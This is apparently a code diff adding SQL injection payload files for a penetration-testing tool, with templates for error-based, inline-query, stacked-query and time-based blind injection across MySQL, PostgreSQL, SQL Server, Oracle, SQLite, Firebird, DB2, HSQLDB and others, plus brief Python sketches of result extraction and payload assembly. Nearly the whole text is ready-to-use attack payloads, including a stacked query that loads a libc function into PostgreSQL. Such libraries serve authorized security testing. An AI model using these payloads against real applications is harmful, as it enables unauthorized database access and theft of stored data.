+ + + MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))))x) + + ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE) + 2 + 3 + 1 + 2,3 + 1 + ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML) + 2 + 5 + 1 + 2,3 + 1 + ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) + + ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s) + + ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 4.1 +
+
+ + + PostgreSQL error-based - ORDER BY, GROUP BY clause + 2 + 3 + 1 + 2,3 + 1 + ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES) + 2 + 5 + 1 + 2,3 + 1 + ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + ,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase error-based - ORDER BY clause + 2 + 4 + 1 + 3 + 1 + ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) + + ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle error-based - ORDER BY, GROUP BY clause + 2 + 4 + 1 + 2,3 + 1 + ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Firebird error-based - ORDER BY clause + 2 + 5 + 1 + 3 + 1 + ,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')) + + ,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + IBM DB2 error-based - ORDER BY clause + 2 + 5 + 1 + 3 + 1 + ,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + ,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + + + + Microsoft SQL Server/Sybase error-based - Stacking (EXEC) + 2 + 2 + 1 + 1-8 + 1 + ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR] + + ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR] + -- + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ +
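All of the error-based tests above wrap the [QUERY] result between two delimiter strings and recover it from the DBMS error text with the [DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP] pattern listed at the end of each test. A rough sketch of that extraction step, with made-up delimiter values and a made-up error message:

```python
# Sketch of the extraction behind the error-based payloads: the query result
# is wrapped between random delimiters and pulled back out of the error
# message with the (?P<result>...) pattern shown in the tests above.
# The delimiter values and sample error text are hypothetical.
import re

DELIMITER_START, DELIMITER_STOP = "qxjzq", "qkqpq"  # random markers in practice

def extract(page_content):
    pattern = "%s(?P<result>.*?)%s" % (DELIMITER_START, DELIMITER_STOP)
    match = re.search(pattern, page_content, re.DOTALL)
    return match.group("result") if match else None

sample_error = "XPATH syntax error: 'qxjzqroot@localhostqkqpq'"
print(extract(sample_error))  # -> root@localhost
```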
diff --git a/data/xml/payloads/inline_query.xml b/data/xml/payloads/inline_query.xml new file mode 100644 index 00000000000..7269be695c4 --- /dev/null +++ b/data/xml/payloads/inline_query.xml @@ -0,0 +1,157 @@ + + + + + + Generic inline queries + 3 + 1 + 1 + 1,2,3,8 + 3 + (SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]')) + + (SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + + + + + MySQL inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + (SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL +
+
+ + + PostgreSQL inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]') + + (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]') + + (SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL) + + + (SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + SQLite inline queries + 3 + 3 + 1 + 1,2,3,8 + 3 + SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' + + SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ SQLite +
+
+ + + Firebird inline queries + 3 + 3 + 1 + 1,2,3,8 + 3 + SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE + + SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + ClickHouse inline queries + 3 + 3 + 1 + 1,2,3,8 + 3 + ('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + ('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ + +
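The inline-query payloads replace the parameter with a subquery that prints the delimited result directly into the page rather than into an error message. A sketch of filling [QUERY] and the delimiters into the generic template above (delimiter values are again placeholders):

```python
# Sketch of building an inline-query payload from the generic template above;
# the template string is copied verbatim, the delimiter values are placeholders.
TEMPLATE = "(SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]'))"

def build_inline(query, start="qxjzq", stop="qkqpq"):
    return (TEMPLATE
            .replace("[DELIMITER_START]", start)
            .replace("[DELIMITER_STOP]", stop)
            .replace("[QUERY]", query))

print(build_inline("SELECT CURRENT_USER()"))
```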
diff --git a/data/xml/payloads/stacked_queries.xml b/data/xml/payloads/stacked_queries.xml new file mode 100644 index 00000000000..b431bb7849f --- /dev/null +++ b/data/xml/payloads/stacked_queries.xml @@ -0,0 +1,730 @@ + + + + + + MySQL >= 5.0.12 stacked queries (comment) + 4 + 2 + 1 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + ;SELECT SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 stacked queries + 4 + 3 + 1 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + ;SELECT SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 stacked queries (query SLEEP - comment) + 4 + 3 + 1 + 1-8 + 1 + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 stacked queries (query SLEEP) + 4 + 4 + 1 + 1-8 + 1 + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 stacked queries (BENCHMARK - comment) + 4 + 3 + 2 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL +
+
+ + + MySQL < 5.0.12 stacked queries (BENCHMARK) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL +
+
+ + + PostgreSQL > 8.1 stacked queries (comment) + 4 + 1 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;SELECT PG_SLEEP([SLEEPTIME]) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 stacked queries + 4 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;SELECT PG_SLEEP([SLEEPTIME]) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL stacked queries (heavy query - comment) + 4 + 2 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) + -- + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL < 8.2 stacked queries (Glibc - comment) + 4 + 3 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) + -- + + + + +
+ PostgreSQL + < 8.2 + Linux +
+
+ + + PostgreSQL < 8.2 stacked queries (Glibc) + 4 + 5 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) + + + + +
+ PostgreSQL + < 8.2 + Linux +
+
+ + + Microsoft SQL Server/Sybase stacked queries (comment) + 4 + 1 + 1 + 1-8 + 1 + ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + ;WAITFOR DELAY '0:0:[SLEEPTIME]' + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase stacked queries (DECLARE - comment) + 4 + 2 + 1 + 1-8 + 1 + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x + + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase stacked queries + 4 + 4 + 1 + 1-8 + 1 + ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + ;WAITFOR DELAY '0:0:[SLEEPTIME]' + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase stacked queries (DECLARE) + 4 + 5 + 1 + 1-8 + 1 + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x + + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment) + 4 + 1 + 1 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL + + ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE) + 4 + 4 + 1 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL + + ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (heavy query - comment) + 4 + 2 + 2 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL + + ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL + + ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (DBMS_LOCK.SLEEP - comment) + 4 + 4 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END + + ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (DBMS_LOCK.SLEEP) + 4 + 5 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END + + ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (USER_LOCK.SLEEP - comment) + 4 + 5 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END + + ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (USER_LOCK.SLEEP) + 4 + 5 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END + + ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END + + + + +
+ Oracle +
+
+ + + IBM DB2 stacked queries (heavy query - comment) + 4 + 3 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) + + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 + -- + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) + + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 + + + + +
+ IBM DB2 +
+
+ + + SQLite > 2.0 stacked queries (heavy query - comment) + 4 + 3 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ + + Firebird stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE + + ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4 + -- + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE + + ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4 + + + + +
+ Firebird + >= 2.0 +
+
+ + + SAP MaxDB stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 + + ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 + -- + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 + + ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 + + + + +
+ SAP MaxDB +
+
+ + + HSQLDB >= 1.7.2 stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 2.0 stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + >= 2.0 +
+
+ + + HSQLDB >= 2.0 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + >= 2.0 +
+
+ + +
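The stacked-query payloads above terminate the original statement with ';', run a second statement (typically a time delay or heavy query), and optionally close off the remainder of the original statement with the comment string listed in the test ('#', '--', '%16'). A sketch of assembling one of the MySQL templates, with an illustrative sleep value and helper name:

```python
# Sketch of assembling a stacked-query payload: fill [SLEEPTIME] and append
# the optional comment suffix from the test definition. The sleep value and
# helper name are illustrative.
SLEEPTIME = 5

def build_stacked(template, comment=""):
    return template.replace("[SLEEPTIME]", str(SLEEPTIME)) + comment

template = ";SELECT SLEEP([SLEEPTIME])"   # reference form of the first MySQL test above
print(build_stacked(template, "#"))       # ;SELECT SLEEP(5)#
```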
diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml new file mode 100644 index 00000000000..21a50ce4016 --- /dev/null +++ b/data/xml/payloads/time_blind.xml @@ -0,0 +1,2174 @@ + + + + + + + + MySQL >= 5.0.12 AND time-based blind (query SLEEP) + 5 + 1 + 1 + 1,2,3,8,9 + 1 + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (query SLEEP) + 5 + 1 + 3 + 1,2,3,9 + 1 + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (SLEEP) + 5 + 2 + 1 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + AND SLEEP([SLEEPTIME]) + + + + +
